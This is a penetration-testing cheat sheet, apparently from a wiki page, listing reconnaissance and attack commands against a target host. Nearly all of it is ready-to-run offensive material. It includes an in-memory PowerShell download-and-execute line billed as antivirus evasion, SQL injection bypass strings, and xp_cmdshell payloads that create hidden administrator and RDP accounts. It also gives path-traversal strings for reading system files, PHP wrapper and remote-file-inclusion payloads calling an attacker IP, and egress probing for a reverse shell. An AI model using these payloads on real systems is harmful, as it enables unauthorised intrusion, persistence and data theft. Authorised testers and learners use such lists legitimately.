Reconnaissance & enumeration
Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:
1
script target.log
Copied!

Port scanning

Nmap

1
nmap -A -sS -Pn -n x.x.x.x
Copied!
Scan all UDP port without a retry
1
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
Copied!

Nc

1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!
This nc command can be very useful to check egress filtering -> see below

PowerShell (in memory -> AV evasion)

1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
Copied!

Host enum

1
nikto -h x.x.x.x
Copied!
1
enum4linux x.x.x.x
Copied!
1
python getArch.py -target x.x.x.x
Copied!

DNS zone transfer

1
dig axfr domain.com @nameserver
Copied!

Web fuzzing

Gobuster
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
Copied!
Wfuzz
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!

Samba (SMB)

Do not underestimate this one ;)
1
smbclient -L x.x.x.x
Copied!
1
nmap --script=smb-check-vulns.nse x.x.x.x
Copied!
1
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
Copied!
1
mount -t cifs //x.x.x.x/share /mnt
Copied!
1
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
Copied!
1
smbclient \\\\x.x.x.x\\share
Copied!
Anonymous bind using rpcclient:
1
rpcclient -U "" x.x.x.x
Copied!

SNMP

Scan using the default community string:
1
snmpwalk -c public -v1 x.x.x.x
Copied!
Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)
1
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
Copied!

CMS

CMSmap

1
cmsmap.py https://x.x.x.x
Copied!

WPscan

1
wpscan --url https://x.x.x.x
Copied!
Bruteforce login:
1
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
Copied!

SQL injection

Test for authentication bypass

1
1' or '1'='1
2
1' or '1'='1'
3
1' or '1'='1'--
4
' or 1=1 --
5
a' or 1=1 --
6
" or 1=1 --
7
a" or 1=1 --
8
' or 1=1 #
9
" or 1=1 #
10
or 1=1 --
11
' or 'x'='x
12
" or "x"="x
13
') or ('x'='x
14
") or ("x"="x
Copied!

Use time delays to find injectable parameter

1
';WAITFOR DELAY '0:0:5'--
2
3
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
4
5
+BENCHMARK(40000000,SHA1(1337))+
6
'%2Bbenchmark(3200,SHA1(1))%2B'
Copied!
If the above works try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)
1
EXEC sp_configure 'show advanced options', 1;
2
RECONFIGURE;
3
EXEC sp_configure 'xp_cmdshell', 1;
4
RECONFIGURE;
Copied!
xp_cmdshell - test ping
1
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
Copied!
xp_cmdshell - add admin user
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --
Copied!
xp_cmdshell - add admin user and to RDP group
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --
Copied!

Local File Inclusion (LFI)

Basic checks

Linux
1
../../../../../../../../../../etc/passwd
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
3
../../../../../../../../../../etc/passwd%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Copied!
Windows
1
../../../../../../../../../../boot.ini
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
3
../../../../../../../../../../boot.ini%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
5
6
../../../../../../../../../../windows/system32/drivers/etc/hosts
7
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
8
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
9
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
Copied!

LFI Wrappers

expect://
1
http://x.x.x.x/blah?parameter=expect://whoami
Copied!
data://
1
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
2
# the base64 encoded payload is: <? phpinfo(); ?>
Copied!
input://
1
http://x.x.x.x/blah?parameter=php://input
2
# POST data (using Hackbar)
3
<? phpinfo(); ?>
Copied!

LFI to RCE

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):
1
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
Copied!

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First start TCPdump at your own box
1
tcpdump -i eth0
Copied!
Run at target (where x.x.x.x is your attacking box)
1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!

Files and file systems

Unmounted file systems
1
cat /etc/fstab
Copied!
World writeable directories
1
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
Copied!
World writeable files
1
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Copied!
Writeable config files
1
find /etc/ -writable -type f 2>/dev/null
Copied!

Last modified 1yr ago